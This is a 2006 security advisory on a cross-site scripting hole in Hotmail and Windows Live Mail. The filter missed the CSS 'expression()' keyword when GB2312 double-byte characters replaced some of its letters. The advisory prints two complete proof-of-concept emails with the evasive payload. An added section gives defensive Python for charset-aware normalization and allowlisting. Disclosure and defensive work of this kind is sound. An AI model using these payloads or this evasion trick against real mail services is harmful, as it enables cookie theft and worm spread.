Hotmail and Windows Live Mail XSS Vulnerabilities
Advisory Name : Hotmail and Windows Live Mail XSS Vulnerabilities
Release Date : 2006.11.03
Tested On : Microsoft IE 6.0
Discovered by : Cheng Peng Su (applesoup_at_gmail.com)
Introduction:
Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft.
Details:
Hotmail's filter identifies "expression()" syntax in a CSS attribute. According
to Hasegawa Yosuke's post (http://archive.openmya.devnull.jp/2006.08/msg00369.html),
in some character encodings (e.g. GB2312) certain double-byte characters can be
substituted for the corresponding ASCII characters in "expression()". This makes
it possible to craft a malformed CSS attribute that Hotmail's filter does not
recognize as "expression()" and therefore fails to strip, while the browser
still evaluates it.
An example:
Hotmail
--------------------------------------------------
MIME-Version: 1.0
From: user<user@xxxxxxxx>
Content-Type: text/html; charset=GB2312
Subject: example
<img id='sss'>
<input id='ttt' value="javascript:alert('xss')">
<span style="font-family:[ascii 163][ascii 197]xpression[ascii 163][ascii 168]document.all.sss.src=document.all.ttt.value)">exploited</span>
.
--------------------------------------------------
Windows Live Mail
--------------------------------------------------
MIME-Version: 1.0
From: user<user@xxxxxxxx>
Content-Type: text/html; charset=GB2312
Subject: example
<img id='sss'>
<input id='ttt' value="javascript:alert('xss')">
<span style="font-family:[ascii 163][ascii 197]xpression[ascii 163][ascii 168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span>
.
--------------------------------------------------
The code injected through the CSS attribute can be used for:
-Getting cookies.
-Potential web-based e-mail worm.
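The following is an added illustration, not part of the original advisory, of why a byte-oriented filter misses the payload above and how a filter that decodes the message with its declared charset and canonicalizes the text catches it. The sample style value is constructed from the advisory's "[ascii N]" notation (0xA3 0xC5 and 0xA3 0xA8 are the GB2312 fullwidth "E" and "(" characters); the function names and the property allowlist are the author's own choices, not Hotmail's code.

```python
import re
import unicodedata

# Constructed sample: the style attribute value from the advisory with the
# "[ascii N]" placeholders replaced by the actual GB2312 bytes.
RAW_STYLE = (
    b"font-family:\xa3\xc5xpression\xa3\xa8"
    b"document.all.sss.src=document.all.ttt.value)"
)

EXPRESSION_RE = re.compile(r"expression\s*\(", re.IGNORECASE)


def naive_filter_flags(style_bytes: bytes) -> bool:
    """Byte-level check of the kind the advisory describes: looks for the
    ASCII string 'expression(' without interpreting the charset. The leading
    'e' and '(' of the payload are double-byte characters, so it sees
    '...xpression...' and reports nothing."""
    return EXPRESSION_RE.search(style_bytes.decode("latin-1")) is not None


def _unescape_css(text: str) -> str:
    """Resolve CSS hex escapes such as \\65 (-> 'e') so they cannot be used
    to split the keyword either."""
    return re.sub(r"\\([0-9a-fA-F]{1,6})\s?",
                  lambda m: chr(int(m.group(1), 16)), text)


def normalized_filter_flags(style_bytes: bytes, charset: str) -> bool:
    """Defensive check: decode with the charset the message declares, fold
    compatibility characters (fullwidth letters and brackets) to ASCII with
    NFKC, strip CSS comments and escapes, then look for the keyword."""
    text = style_bytes.decode(charset, errors="replace")
    text = unicodedata.normalize("NFKC", text)
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)  # a/**/b tricks
    text = _unescape_css(text)
    return EXPRESSION_RE.search(text) is not None


# Allowlist approach: rather than hunting for bad keywords, keep only known
# properties whose values match a narrow value grammar. Anything containing
# '(', '=', or other script-capable syntax is dropped outright.
SAFE_PROPS = {"color", "font-family", "font-size", "font-weight", "text-align"}
SAFE_VALUE_RE = re.compile(r"^[A-Za-z0-9 ,.#%-]+$")


def allowlist_style(style_bytes: bytes, charset: str) -> str:
    """Return a rebuilt style string containing only allowlisted declarations
    (decoded and NFKC-normalized first, so the fullwidth trick is visible)."""
    text = unicodedata.normalize("NFKC",
                                 style_bytes.decode(charset, errors="replace"))
    kept = []
    for decl in text.split(";"):
        if ":" not in decl:
            continue
        prop, _, value = decl.partition(":")
        prop, value = prop.strip().lower(), value.strip()
        if prop in SAFE_PROPS and SAFE_VALUE_RE.match(value):
            kept.append(f"{prop}:{value}")
    return ";".join(kept)


if __name__ == "__main__":
    print("naive filter flags payload:     ", naive_filter_flags(RAW_STYLE))
    print("normalized filter flags payload:", normalized_filter_flags(RAW_STYLE, "gb2312"))
    print("allowlisted style:              ", repr(allowlist_style(RAW_STYLE, "gb2312")))
```

The key design point is that the filter and the browser must agree on what the bytes mean: decode with the charset the message itself declares (or force a single charset before filtering), canonicalize, and only then inspect, and prefer an allowlist of properties and values over a denylist of keywords.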
Vendor status:
Microsoft was notified on Sep 25th, 2006.
The bug is now fixed.
Original advisory:
http://applesoup.googlepages.com/hotmail_xss.txt